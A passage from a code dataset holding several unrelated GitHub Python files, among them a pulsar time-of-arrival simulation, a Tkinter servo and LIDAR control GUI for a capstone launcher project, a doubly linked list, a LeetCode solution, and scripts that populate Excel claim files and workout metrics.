max_z12_power=data)\n savepath.chmod(0o100666)\n\n\ndef execute(\n arrivals: List[float],\n chi: float,\n simulations: int,\n savepath: Path,\n debug: bool = False,\n) -> None:\n \"\"\"\n Run the simulation .\n\n Parameters\n ----------\n arrivals : List[float]\n [description]\n chi : float\n [description]\n processors : int\n [description]\n simulations : int\n [description]\n savepath: str\n [description]\n \"\"\"\n if debug:\n log.setLevel(logging.DEBUG)\n log.debug(\"Job Recieved: ✔️\")\n np.random.seed(random.SystemRandom().randint(0, 2147483647))\n log.debug(\"Random Seed : ✔️\")\n grid = frequency_grid()\n log.debug(\"Frequency Grid: ✔️\")\n toas, errors, differences, minimum, maximum = parameters(\n arrivals=arrivals,\n chi=chi,\n simulations=simulations,\n )\n log.debug(\"Parameters: ✔️\")\n differences_mc, toas_mc, errors_mc = simulate(\n 
simulations, differences, minimum, maximum\n )\n log.debug(\"Dataset: ✔️\")\n max_z12_power = np.zeros(len(toas_mc))\n\n for index in tqdm(\n np.arange(0, len(toas_mc), 1),\n ascii=True,\n desc=\"simulating\",\n leave=True,\n ):\n toa = toas_mc[index]\n error = errors_mc[index]\n z1 = z2search(toa, error, grid)\n max_index = np.argmax(z1)\n max_period = 1.0 / grid[max_index] # noqa: F841\n max_z12_power[index] = z1[max_index]\n log.debug(\"Simulations: ✔️\")\n save(max_z12_power, savepath)\n log.debug(\"Save: ✔️\")\n","repo_name":"CHIMEFRB/subpulse","sub_path":"subpulse/analysis/toa.py","file_name":"toa.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
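What z2search in the toa.py record scans for is phase clustering: events folded at the true pulse frequency pile up in phase and give a large Z^2_1, while a wrong frequency spreads them out. A numpy-only sketch with synthetic arrival times; the frequencies and jitter are invented for the demo:

import numpy as np

rng = np.random.default_rng(0)
true_freq = 2.0  # Hz, assumed for the demo
toas = np.arange(200) / true_freq + rng.normal(0.0, 0.01, 200)

def z2_1(phase):
    # two-term power sum, the n=1 case of z_n above
    ang = 2.0 * np.pi * phase
    return 2.0 / phase.size * (np.cos(ang).sum() ** 2 + np.sin(ang).sum() ** 2)

print(z2_1((toas * true_freq) % 1.0))  # large: phases cluster near 0
print(z2_1((toas * 1.37) % 1.0))       # small: phases spread out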
+{"seq_id":"5419705174","text":"# This is version 2 of the Control GUI for my Capstone project.\r\n# It includes a safety system for the fire control, an elevation indicator,\r\n# and the potential for linking to another camera to read the pressure gage.\r\n\r\n# OPERATIONAL NOTES:\r\n# The fire button only enables when all three checkboxes are checked, providing a triple-redundant safety.\r\n# The cinch button only enables after the fire button has been pressed.\r\n# The drag deploy button only enables after the cinch button has been pressed.\r\n\r\n# SPECIAL NOTE: If the fire, cinch, or drag buttons break, add a global definition directly above its first use inside a function.\r\n\r\nfrom __future__ import division # servo\r\nimport Tkinter as tk # GUI\r\nimport cv2 # Pressure Gage\r\nfrom PIL import Image, ImageTk # Pressure Gage\r\nimport time # servo and LIDAR\r\nimport math # servo\r\nimport Adafruit_PCA9685 # servo\r\nimport smbus # LIDAR\r\n\r\n# Some LIDAR initializers\r\nbus=smbus.SMBus(1)\r\naddr=0x62\r\n\r\n##import tkMessageBox as mb # This is just so that there is a dialog box that pops up to confirm the fire.\r\n\r\nroot = tk.Tk() # initialize the window.\r\nroot.geometry('590x420') # Sets the default window size\r\nroot.title(\"Control GUI\")\r\n\r\n# ****************************************************************************\r\n# This section contains the elevation indicator.\r\nelevationLabel = tk.Label(root, text = \"Elevation (deg):\", font = 20)\r\nelevationValue = tk.DoubleVar() # this holds the actual elevation value\r\neleValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the elevation.\r\n\r\ndef getElevation(elevation): # a function for changing the elevation value.\r\n elevationValue.set(elevation)\r\n\r\ndef updateEle(root, *args): # called when the elevation value is changed.\r\n eleValOut.config(text = elevationValue.get())\r\n\r\nelevationValue.trace(\"w\", updateEle)\r\n\r\nelevationLabel.grid(row=0, column=0)\r\neleValOut.grid(row=0, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the rotation indicator.\r\nrotationLabel = tk.Label(root, text = \"Rotation (deg):\", font = 20)\r\nrotationValue = tk.DoubleVar() # this holds the actual rotation value\r\nrotValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the rotation.\r\n\r\ndef getRotation(rotation): # a function for changing the rotation value.\r\n rotationValue.set(rotation)\r\n\r\ndef updateRot(root, *args): # called when the rotation value is changed.\r\n rotValOut.config(text = rotationValue.get())\r\n\r\nrotationValue.trace(\"w\", updateRot)\r\n\r\nrotationLabel.grid(row=1, column=0)\r\nrotValOut.grid(row=1, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the range indicator.\r\nrangeLabel = tk.Label(root, text = \"Distance to Target:\", font = 20)\r\nrangeValue = tk.DoubleVar() # this holds the actual range value\r\nranValOut = tk.Label(root, text = \"0.0\", font = 20) # The specific label for displaying the range.\r\n\r\ndef getRange(dist): # a function for changing the range value.\r\n rangeValue.set(dist)\r\n\r\ndef updateRan(root, *args): # called when the range value is changed.\r\n ranValOut.config(text = rangeValue.get())\r\n\r\ndef rangeFind(): # This section is the LIDAR code\r\n t_end = time.time() + 5\r\n while time.time() < t_end:\r\n bus.write_byte_data(0x62,0x00, 
0x04) \r\n val_high=bus.read_byte_data(0x62,0x0f) \r\n val_low=bus.read_byte_data(0x62,0x10) \r\n dist_cm=val_high*256+val_low\r\n dist_ft=dist_cm*0.0328084\r\n getRange(dist_ft)\r\n #print `dist_ft` + \" ft \"\r\n time.sleep(0.05)\r\n\r\nrangeValue.trace(\"w\", updateRan)\r\n\r\nuRanButton = tk.Button(root, text='Update Range', command=rangeFind)\r\n\r\nrangeLabel.grid(row=2, column=0)\r\nranValOut.grid(row=2, column=1)\r\nuRanButton.grid(row=2, column=2)\r\n\r\n# ****************************************************************************\r\n# This section contains the video for reading the pressure gage. It is purely optional.\r\n##picW = 320\r\n##picH = 214\r\n##ImageFrame=tk.Frame(root,width=picW,height=picH)\r\n##lmain=tk.Label(ImageFrame)\r\n##gageLabel = tk.Label(root, text = \"Pressure Gage:\", font = 20)\r\n##\r\n##cap=cv2.VideoCapture(0) # sets the camera\r\n##\r\n##def getVideo():\r\n## _,frame = cap.read()\r\n## hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\r\n## hsv = cv2.resize(hsv, (picW, picH), interpolation=cv2.INTER_AREA)\r\n## img=Image.fromarray(hsv)\r\n## imgtk=ImageTk.PhotoImage(image=img)\r\n## lmain.imgtk=imgtk\r\n## lmain.configure(image=imgtk)\r\n## lmain.after(10,getVideo)\r\n## \r\n##getVideo() # This actually uses the camera to capture images. You may delete it.\r\n##gageLabel.grid(row=3, column=0)\r\n##ImageFrame.grid(row=3, column=1) # keep these locations the same.\r\n##lmain.grid(row=3, column=1) # keep these locations the same.\r\n\r\n# ****************************************************************************\r\n# This section contains the fire control and safety system.\r\n# these are the variables controlled by the checkboxes.\r\nflag1 = tk.BooleanVar()\r\nflag2 = tk.BooleanVar()\r\nflag3 = tk.BooleanVar()\r\nfireState = tk.BooleanVar(value=False)\r\n\r\ndef fire():\r\n # Insert whatever code we want here. 
It could just be a print statement.\r\n #mb.showinfo('FIRE', 'BOOM')\r\n print(\"BOOM\")\r\n fireState.set(True)\r\n\r\nfireButton = tk.Button(root, state=tk.DISABLED, text='Fire', command=fire) # sets the fire button to disabled by default.\r\n \r\ndef safetySys(root, *args): # The parameters of this function are automatically generated by the trace call.\r\n if all([flag1.get(), flag2.get(), flag3.get()]): # If all 3 checkboxes are checked, enable the fire button.\r\n fireButton.config(state=tk.NORMAL)\r\n else: # If not, disable the fire button for safety.\r\n fireButton.config(state=tk.DISABLED)\r\n\r\n# The locations of the safety boxes and fire button \r\ntk.Checkbutton(root, variable=flag1).grid(row=4, column=0)\r\ntk.Checkbutton(root, variable=flag2).grid(row=4, column=1)\r\ntk.Checkbutton(root, variable=flag3).grid(row=4, column=2)\r\nfireButton.grid(row=5, column=1)\r\n\r\n# These lines watch for a change in the variables controlled by the checkboxes.\r\nflag1.trace(\"w\", safetySys)\r\nflag2.trace(\"w\", safetySys)\r\nflag3.trace(\"w\", safetySys)\r\n\r\n# ****************************************************************************\r\n# This section contains the cinch control\r\ncinchState = tk.BooleanVar(value=False)\r\ndef cinch():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('CINCH', 'WHIRRRRRRRR')\r\n print(\"WHIRRRRRRRRR\")\r\n fireState.set(False)\r\n cinchState.set(True)\r\n\r\ncinchButton = tk.Button(root, state=tk.DISABLED, text='Cinch', command=cinch) # sets the cinch button to disabled by default\r\n\r\ndef enableCinch(root, *args): # if the fire button has been pressed, enable the cinch button.\r\n if fireState.get():\r\n cinchButton.config(state=tk.NORMAL) # enables the cinch button.\r\n else:\r\n cinchButton.config(state=tk.DISABLED)\r\n\r\nfireState.trace(\"w\", enableCinch) # when the fireState variable changes, check if you should enable the cinch button.\r\n\r\ncinchButton.grid(row=6, column=1)\r\n\r\n# ****************************************************************************\r\n# This section contains the drag device control\r\ndef dragDeploy():\r\n # Insert whatever code we want/need here.\r\n #mb.showinfo('Deploy Confirm', 'Junk Deorbiting')\r\n print(\"Junk Deorbiting\")\r\n\r\ndragButton = tk.Button(root, state=tk.DISABLED, text='Drag Device', command=dragDeploy) # sets the drag button to disabled by default\r\n\r\ndef enableDrag(root, *args): # if the cinch button has been pressed, enable the drag device button\r\n dragButton.config(state=tk.NORMAL) # enables the drag button.\r\n\r\ncinchState.trace(\"w\", enableDrag) # when the cinchState variable changes, check if you should enable the drag button.\r\n\r\ndragButton.grid(row=7, column=1)\r\n\r\n# ****************************************************************************\r\n### debug window. 
Manually change elevation and rotation.\r\n##dew = tk.Toplevel() # define an entirely seperate window for the entries\r\n##dew.geometry('320x75')\r\n##dew.title(\"Debug Window\")\r\n##deELab = tk.Label(dew, text = \"Enter Elevation:\", font = 20) # the labels\r\n##deRLab = tk.Label(dew, text = \"Enter Rotation:\", font = 20)\r\n##deRgLab = tk.Label(dew, text = \"Enter Range:\", font = 20)\r\n##\r\n##elevationEntry = tk.Entry(dew) # the entry fields\r\n##rotationEntry = tk.Entry(dew)\r\n##rangeEntry = tk.Entry(dew)\r\n##\r\n##def passEle(event):\r\n## getElevation(elevationEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##def passRot(event):\r\n## getRotation(rotationEntry.get()) # get the value in the field and pass it to the get function.\r\n## \r\n##def passRan(event):\r\n## getRange(rangeEntry.get()) # get the value in the field and pass it to the get function.\r\n##\r\n##elevationEntry.bind(\"\", passEle) # get the number in the entry field when enter is pressed.\r\n##rotationEntry.bind(\"\", passRot) # get the number in the entry field when enter is pressed.\r\n##rangeEntry.bind(\"\", passRan)\r\n##\r\n##deELab.grid(row=0, column=0)\r\n##elevationEntry.grid(row=0, column=1)\r\n##deRLab.grid(row=1, column=0)\r\n##rotationEntry.grid(row=1, column=1)\r\n##deRgLab.grid(row=2, column=0)\r\n##rangeEntry.grid(row=2, column=1)\r\n\r\n# ****************************************************************************\r\n# This section is for the motor motion.\r\npwm = Adafruit_PCA9685.PCA9685()\r\n\r\nminMotionX = 380 # The maximum servo motion left and right (pan)\r\nminMotionY = 150\r\nmaxMotionX = 470 # The maximum servo motion left and right (pan)\r\nmaxMotionY = 670 # The maximum servo motion up and down (tilt)\r\nmoveDis = 1 # Tells the key presses how far to move each time\r\n\r\ntiltSet = 530 # Sets start and end position of motor\r\npanSet = 413 # Sets start and end position of motor # 410\r\n\r\ncurX = panSet # Holds the current x position\r\ncurY = tiltSet # Holds the current y position # 400\r\n\r\npwm.set_pwm_freq(60) # Set frequency to 60hz, good for servos.\r\npwm.set_pwm(14, 14, panSet) # Set X starting position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y starting position # 387\r\nprint('Initializing servos on channel 0 and 1, \"X\" GUI window to quit...')\r\nprint('If cv2 color doesnt run: close the program, give it 5 seconds, then try again')\r\n\r\n# ------------------------------\r\n# Servo functions\r\ndef updatePos():\r\n \r\n pwm.set_pwm(15, 15, curY)\r\n\r\n # These Lines Translate curX,curY into reference (X,Y) coordinates for user\r\n coordX = curX-panSet\r\n coordY = -(curY-tiltSet) # Sign is flipped because Torxis motors read PWM backwards from mini servos\r\n## print(coordX,coordY) # Print current X,Y servo positions\r\n # These Lines output an angle from linear fit calibration based on known angles and PWM signals (coordY) \r\n pitchAngle = -.000003*coordY*coordY*coordY + .0016*coordY*coordY + .2399*coordY + .1111\r\n panAngle = .000002*coordX*coordX*coordX*coordX + .0001*coordX*coordX*coordX - .0041*coordX*coordX + 1.1562*coordX - 1.6779\r\n getElevation(pitchAngle)\r\n getRotation(panAngle)\r\n## print(panAngle,'Pan Degrees') # Diplays servo pan angle from zero\r\n## print(pitchAngle,'Tilt Degrees') # Displays servo pitch angle from local horizontal\r\n## print(' ') # To indent different displayed values per servo position\r\n \r\n pwm.set_pwm(14, 14, curX)\r\n return\r\n\r\ndef keyMotionUp(event):\r\n #print(\"Key Down\")\r\n global 
curY\r\n    moveDis = 1\r\n    curY -= moveDis\r\n    if curY < minMotionY: # Up decreases curY (Torxis PWM is inverted), so clamp at the lower limit\r\n        curY = minMotionY\r\n    updatePos()\r\n    return\r\n\r\ndef keyMotionDown(event):\r\n    #print(\"Key Up\")\r\n    global curY\r\n    moveDis = 1\r\n    curY += moveDis\r\n    if curY > maxMotionY: # Down increases curY, so clamp at the upper limit\r\n        curY = maxMotionY\r\n    updatePos()\r\n    return\r\n\r\ndef keyMotionLeft(event):\r\n    #print(\"Key Left\")\r\n    global curX\r\n    moveDis = 1\r\n    curX -= moveDis\r\n    if curX < minMotionX:\r\n        curX = minMotionX\r\n    updatePos()\r\n    return\r\n\r\ndef keyMotionRight(event):\r\n    #print(\"Key Right\")\r\n    global curX\r\n    moveDis = 1\r\n    curX += moveDis\r\n    if curX > maxMotionX - 12: # The \"-12\" here is to keep the x on the screen. This may be deleted for the actual motors\r\n        curX = maxMotionX - 12\r\n    updatePos()\r\n    return\r\n# ---------------Fast Key Options-----------------\r\ndef keyMotionFastUp(event):\r\n    #print(\"Key Down\")\r\n    global curY\r\n    moveDis = 5\r\n    curY -= moveDis\r\n    if curY < minMotionY:\r\n        curY = minMotionY\r\n    updatePos()\r\n    return\r\n\r\ndef keyMotionFastDown(event):\r\n    #print(\"Key Up\")\r\n    global curY\r\n    moveDis = 5\r\n    curY += moveDis\r\n    if curY > maxMotionY:\r\n        curY = maxMotionY\r\n    updatePos()\r\n    return\r\n\r\ndef keyMotionFastLeft(event):\r\n    #print(\"Key Left\")\r\n    global curX\r\n    moveDis = 5\r\n    curX -= moveDis\r\n    if curX < minMotionX:\r\n        curX = minMotionX\r\n    updatePos()\r\n    return\r\n\r\ndef keyMotionFastRight(event):\r\n    #print(\"Key Right\")\r\n    global curX\r\n    moveDis = 5\r\n    curX += moveDis\r\n    if curX > maxMotionX - 12: \r\n        curX = maxMotionX - 12\r\n    updatePos()\r\n    return\r\n#------------------------------------\r\n\r\n# End of servo functions\r\n# -------------------------------------------\r\n# The other bits: a bind and the prints.\r\nroot.bind('<Up>', keyMotionUp) # These functions detect a directional keypress,\r\nroot.bind('<Down>', keyMotionDown) # then call the function that is the second argument.\r\nroot.bind('<Left>', keyMotionLeft)\r\nroot.bind('<Right>', keyMotionRight)\r\n# Fast (5-step) moves; the Shift+arrow bindings are an assumption\r\nroot.bind('<Shift-Up>',keyMotionFastUp)\r\nroot.bind('<Shift-Down>',keyMotionFastDown)\r\nroot.bind('<Shift-Left>',keyMotionFastLeft)\r\nroot.bind('<Shift-Right>',keyMotionFastRight)\r\n\r\n# ****************************************************************************\r\nroot.mainloop() # Displays the GUI until the close button is pressed.\r\n#cap.release() # shuts down the camera when the program is closed.\r\n\r\npwm.set_pwm(14, 14, panSet) # Set X ending position\r\npwm.set_pwm(15, 15, tiltSet) # Set Y ending position\r\n","repo_name":"armaged835/Motion-Tracker-and-Launcher","sub_path":"Control GUI V3.py","file_name":"Control GUI V3.py","file_ext":"py","file_size_in_byte":14111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42657044129","text":"class Solution(object):\n    def maxEnvelopes(self, envelopes):\n        \"\"\"\n        :type envelopes: List[List[int]]\n        :rtype: int\n        \"\"\"\n        if len(envelopes) == 0:\n            return 0\n        dp = []\n        envelopes.sort(key=lambda x: (x[0], -x[1]))\n        for i in range(len(envelopes)):\n            l, r = 0, len(dp)\n            while l < r:\n                mid = (l + r) // 2  # integer division keeps mid a valid index on Python 3\n                if dp[mid] < envelopes[i][1]:\n                    l = mid + 1\n                else:\n                    r = mid\n            if r >= len(dp):\n                dp.append(envelopes[i][1])\n            else:\n                dp[r] = envelopes[i][1]\n        return len(dp)","repo_name":"maruichen2004/LeetCode","sub_path":"Russian_Doll_Envelopes.py","file_name":"Russian_Doll_Envelopes.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
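The solution above sorts envelopes by width ascending and height descending, then reduces the problem to the longest strictly increasing subsequence of heights; its hand-rolled binary search is exactly bisect_left. A usage check plus the equivalent bisect form (the sample input is the classic LeetCode example):

from bisect import bisect_left

print(Solution().maxEnvelopes([[5, 4], [6, 4], [6, 7], [2, 3]]))  # 3

def lis_length(heights):
    dp = []  # dp[i] holds the smallest tail of an increasing subsequence of length i + 1
    for h in heights:
        i = bisect_left(dp, h)
        if i == len(dp):
            dp.append(h)
        else:
            dp[i] = h
    return len(dp)

print(lis_length([3, 4, 7, 4]))  # 3: the height sequence after sorting the envelopes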
+{"seq_id":"71111665052","text":"import pathlib\nimport os\n\nfrom constructive.constructive_heuristic import assign_districts\nfrom utilities import read_instance, distance_matrix, MapVisualiser\nfrom solution import Solution\nfrom taboo_search.search_manager import run_search\n\nif __name__ == \"__main__\":\n    relative_path = pathlib.Path(__file__).parent.absolute()\n    clients = read_instance(os.path.join(relative_path, 'instances', 'instance_small.txt'))\n    dist_matrix = distance_matrix(clients)  # avoid shadowing the imported function\n    K = 6\n    g = 150\n    b = 3\n    rnd_seed = 0\n    \n    districts = assign_districts(clients, K, dist_matrix, g, b, rnd_seed)\n    for district in districts:\n        district.best_ever_average_distance = district.value\n    \n    print(\"constructive solution %s\" %(districts[-1].value - districts[0].value))\n    iterClientes = 5\n    iterSwap = 25\n    districts, best_OF_ever = run_search(districts, dist_matrix, 50, iterClientes, iterSwap)\n    districts.sort(key=lambda di: di.value)\n    solution = Solution(districts)\n    mp_v = MapVisualiser()\n    mp_v.draw_cluster(solution)\n    print(\"TS solution: clients %s, swap %s, OF %s\" %(iterClientes, iterSwap, solution.OF))","repo_name":"camilovelez/claseMetaheuristica","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25226301518","text":"class Node:\n    def __init__(self,value):\n        self.value = value\n        self.next = None\n        self.prev = None\n        \n        \nclass DoublyLinkedList:\n    def __init__(self, value):\n        new_node = Node(value)\n        self.head = new_node\n        self.tail = new_node\n        self.length = 1\n     \n        \n    def print_DLL(self):\n        temp = self.head\n        while(temp):\n            print(temp.value)\n            temp = temp.next\n       \n     \n    def append(self, *values):\n        for value in values:\n            new_node = Node(value)\n            if self.length == 0:\n                self.head = new_node\n                self.tail = new_node\n                self.length += 1\n                continue  # keep going so every value is appended\n            new_node.prev = self.tail\n            self.tail.next = new_node\n            self.tail = new_node\n            self.length += 1\n        return True\n    \n    \n    def pop(self):\n        if self.length == 0:\n            return None\n        temp = self.tail\n        if self.length == 1:\n            self.head = None\n            self.tail = None\n            self.length -= 1\n            return temp.value\n        self.tail = temp.prev  # move the tail back before detaching the old node\n        self.tail.next = None\n        temp.prev = None\n        self.length -= 1\n        return temp.value\n    \n    \n    def prepend(self,value):\n        if self.length == 0:\n            return self.append(value)\n        new_node = Node(value)\n        new_node.next = self.head\n        self.head.prev = new_node\n        self.head = new_node\n        self.length += 1\n        return True\n    \n    def popfirst(self):\n        if self.length <= 1:\n            return self.pop()\n        temp = self.head\n        self.head = temp.next\n        self.head.prev = None\n        temp.next = None  \n        self.length -= 1\n        return temp\n    \n    \n    def get(self, index):\n        if index <0 or index >= self.length:\n            return None\n        if index < self.length/2:\n            temp = self.head\n            for _ in range(index):\n                temp = temp.next\n            return temp\n        temp = self.tail\n        for _ in range(self.length-1, index, -1):\n            temp = temp.prev\n        return temp\n\n    \n    def set(self, index, value):\n        temp = self.get(index)\n        if (temp):\n            temp.value = value\n            return True\n        else:\n            return False\n    \n    def insert(self, index, value):\n        if index < 0 or index > self.length:\n            return False\n        elif index == 0:\n            return self.prepend(value)\n        elif index == self.length:\n            return self.append(value)\n        else:\n            new_node = Node(value)\n            temp = self.get(index - 1)\n            new_node.next = temp.next\n            new_node.prev = temp \n            temp.next.prev = new_node\n            temp.next = new_node\n            self.length += 1\n            return True\n    \n    def remove(self, index):\n        if index < 0 or index >= self.length:\n            return None\n        if index == 0:\n            return self.popfirst()\n        if index == self.length-1:\n            return self.pop()\n        if self.length == 1:\n            return self.pop()\n        temp = self.get(index)\n        temp.prev.next = temp.next\n        temp.next.prev = temp.prev \n        temp.next = None\n        temp.prev = None\n        self.length -= 1\n        return temp\n    \nx = DoublyLinkedList(1)\n#x.append(2,3,4,5,6,7,8,9)\n#x.prepend(0)\n\n#x.print_DLL()\nx.insert(7,100)\nprint(\"#########################\")\nx.remove(0)\n#print(x.get(7).value)\n\nprint(\"#########################\")\nprint(\"head = {}, tail = {}, length = {}\".format(x.head.value if x.head else x.head, x.tail.value if x.tail else x.tail, x.length))\nx.print_DLL()","repo_name":"tk8320/DataStructures","sub_path":"DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
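A few assertions exercising the list above end to end, useful as a quick regression check on the pointer bookkeeping in append, pop, and prepend:

dll = DoublyLinkedList(10)
dll.append(20, 30)
assert dll.pop() == 30
assert dll.tail.value == 20 and dll.tail.next is None  # tail really moved back one node
dll.prepend(5)
assert [dll.get(i).value for i in range(dll.length)] == [5, 10, 20]
assert dll.head.prev is None and dll.length == 3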
+{"seq_id":"33998821921","text":"from base45reflex.SQLModels import Exercise, User, UserProgramHistory, Workout, WorkoutSet, UserWorkoutMetrics\nfrom sqlmodel import Session, create_engine, select\nfrom rxconfig import ENVIRONMENT\n\n\ndef calculate_metrics(user: User, session: Session):\n    program_history_statement = UserProgramHistory.select.filter(UserProgramHistory.user_id == user.id)\n    program_history = session.scalars(program_history_statement).all()\n    for program in program_history:\n        workout_statement = (Workout.select.filter(Workout.user_id == user.id)\n                             .filter(Workout.date <= program.end_date)\n                             .filter(Workout.date >= program.start_date))\n        workout_list = session.scalars(workout_statement).all()\n        if not workout_list:\n            continue\n        for workout in workout_list:\n            set_statement = select(WorkoutSet, Exercise).join(Exercise).where(WorkoutSet.workout_id == workout.id)\n            # use the session passed in, not the module-level one from __main__\n            set_list = session.exec(set_statement).all()\n            for ex_set in set_list:\n                temp_set = ex_set[0]\n                exercise = ex_set[1]\n                load_value = temp_set.weight * temp_set.num_sets\n                load = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='TotalLoad', date=workout.date,\n                                          exercise=exercise.name, value=load_value, unit_id=temp_set.unit_id)\n                avg_rpe = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, value=temp_set.avg_rpe,\n                                             date=workout.date, exercise=exercise.name, metric='AvgRPE')\n                avg_reps = UserWorkoutMetrics(set_id=temp_set.id, user_id=user.id, metric='AvgRepsPerSet',\n                                              date=workout.date, exercise=exercise.name,\n                                              value=temp_set.reps/temp_set.num_sets)\n                session.add(load)\n                session.add(avg_rpe)\n                session.add(avg_reps)\n        session.commit()\n\n\nif __name__ == \"__main__\":\n    if ENVIRONMENT == \"DEV\":\n        db_url = \"sqlite:///reflex_dev.db\"\n    else:\n        db_url = \"sqlite:///reflex.db\"\n\n    engine = create_engine(db_url)\n\n    with Session(engine) as sess:\n        user_list = sess.scalars(User.select.filter()).all()\n\n        for user in user_list:\n            calculate_metrics(user, sess)\n","repo_name":"raven-black-dream/base45reflex","sub_path":"calculate_metrics.py","file_name":"calculate_metrics.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7718342456","text":"#!/usr/bin/python\n# FINAL SCRIPT updated as of 8th April 2020\n# Workflow - CBA/MEDICLINIC\n# Version 1\n\n# Declare Python libraries needed for this script\nimport pandas as pd\nimport numpy as np\nfrom xlrd import open_workbook\nimport xlrd\nimport os\nimport math\n\ndef populate_data_medi(disbursementClaim, bordlisting, disbursementMaster, destination, medi_base):\n\n    try:\n        DCM_df, BordListing_df, DC_df = medi_mapping(disbursementMaster, bordlisting, disbursementClaim)\n        DCM_df.to_excel(destination + 'disbursement master(new).xlsx', index = False)\n        BordListing_df.to_excel(destination + \"Bord Listing(new).xlsx\", index = False, header = False)\n        DC_df.to_excel(destination + \"Disbursement Claim(new).xlsx\", index = False, header = False)\n    except Exception as error:\n        print('ERROR:', error)\n\ndef medi_mapping(disbursementMaster, bordereauxListing, disbursementClaim):\n    \n    wb = xlrd.open_workbook(bordereauxListing)\n    bordlist_df = pd.read_excel(wb)\n\n    dcm_workbook = open_workbook(disbursementMaster)\n    dcm_sheet = dcm_workbook.sheet_by_index(0)\n    df = pd.read_excel(dcm_workbook)\n    \n    if df.columns[0] != 'Date':\n        dcm_df = pd.read_excel(disbursementMaster, sheet_name = 0, skiprows = 2, usecols = list(range(dcm_sheet.ncols + 1)))\n    else:\n        dcm_df = pd.read_excel(disbursementMaster, sheet_name = 0, skiprows = 0, usecols = list(range(dcm_sheet.ncols + 1)))\n\n    newRunningNo = dcm_df.iloc[get_DCM_fill_index(disbursementMaster), 1]\n    newRowIndex = get_DCM_fill_index(disbursementMaster)\n\n    # Perform update data into new row in Disbursement Claim Master file\n    print(\"- Perform update data into new row in Disbursement Claim Master file.\")\n    \n    data2 = pd.read_excel(bordereauxListing, skiprows = 11)\n    totalCases = get_number_cases_price(bordereauxListing)\n    price = data2.loc[get_number_cases_price(bordereauxListing), 'Aetna Amount']\n    initial = data2.loc[get_Initial_index(bordereauxListing), 'Aetna Amount']\n    ##Mapping\n    bordlist_df.iloc[5,2] = newRunningNo\n    dcm_df.loc[newRowIndex, 'Date'] = bordlist_df.iloc[3, 2]\n    dcm_df.loc[newRowIndex, 'Bord No'] = bordlist_df.iloc[2, 2]\n    dcm_df.loc[newRowIndex, 'Corporate'] = bordlist_df.iloc[0, 2]\n    dcm_df.loc[newRowIndex, 'Amount (RM) \\n(Kindly put (RM0.00) for CN)'] = price\n    dcm_df.loc[newRowIndex, 'Initial'] = initial\n    dcm_df.loc[newRowIndex, 'Total no of cases bord'] = totalCases\n\n    ###Populate Disbursement Claim\n    wb = xlrd.open_workbook(disbursementClaim)\n    dc_df = pd.read_excel(wb)\n\n    dc_df.iloc[18, 3] = newRunningNo\n    dc_df.iloc[18, 8] = dcm_df.loc[newRowIndex, 'Date']\n    dc_df.iloc[28, 3] = dcm_df.loc[newRowIndex, 'Bord No']\n    dc_df.iloc[28, 0] = dcm_df.loc[newRowIndex, 'Corporate']\n    dc_df.iloc[28, 7] = price\n    dc_df.iloc[54, 6] = initial\n\n\n    return dcm_df, bordlist_df, dc_df\n    \ndef get_DCM_fill_index(disbursementMaster):\n    dcm_workbook = open_workbook(disbursementMaster)\n    dcm_sheet = dcm_workbook.sheet_by_index(0)\n    df = pd.read_excel(dcm_workbook)\n    if df.columns[0] != 'Date':\n        data=pd.read_excel(disbursementMaster, skiprows = 2 , na_values = \"Missing\")\n    else:\n        data=pd.read_excel(disbursementMaster, skiprows = 0 , na_values = \"Missing\")\n\n    Bord_No_list = pd.DataFrame(data, columns=['Bord No']).values.tolist()\n    counter=len(Bord_No_list)-1\n    try:\n        while True:\n            math.isnan(Bord_No_list[counter][0])\n            counter-=1\n    except:\n        a=None\n    fill_index=counter+1\n    return fill_index\n\ndef get_number_cases_price(bordereauxListing):\n    data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = 
\"Missing\")\n Diagnosis_Description_list = pd.DataFrame(data, columns=['Diagnosis Description [Code]']).values.tolist()\n counter=len(Diagnosis_Description_list)-1\n try:\n while True:\n math.isnan(Diagnosis_Description_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter+1\n return fill_index\n\ndef get_Initial_index(bordereauxListing):\n data=pd.read_excel(bordereauxListing,skiprows = 11 , na_values = \"Missing\")\n Anetna_Amount_Column_list = pd.DataFrame(data, columns=['Aetna Amount']).values.tolist()\n counter=len(Anetna_Amount_Column_list)-1\n try:\n while True:\n math.isnan(Anetna_Amount_Column_list[counter][0])\n counter-=1\n except:\n a=None\n fill_index=counter-1\n return fill_index\n\n","repo_name":"WendellTeam/AICoreEngine","sub_path":"AIEngine/transformation/populate_data_medi.py","file_name":"populate_data_medi.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
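The three walk-backwards loops in populate_data_medi.py locate the first empty row after the last filled cell by probing values until an exception ends the scan. pandas already exposes this directly as last_valid_index; a small standalone illustration with made-up values:

import numpy as np
import pandas as pd

s = pd.Series([10.0, 20.0, np.nan, 30.0, np.nan, np.nan])
last = s.last_valid_index()                    # 3: label of the last non-NaN entry
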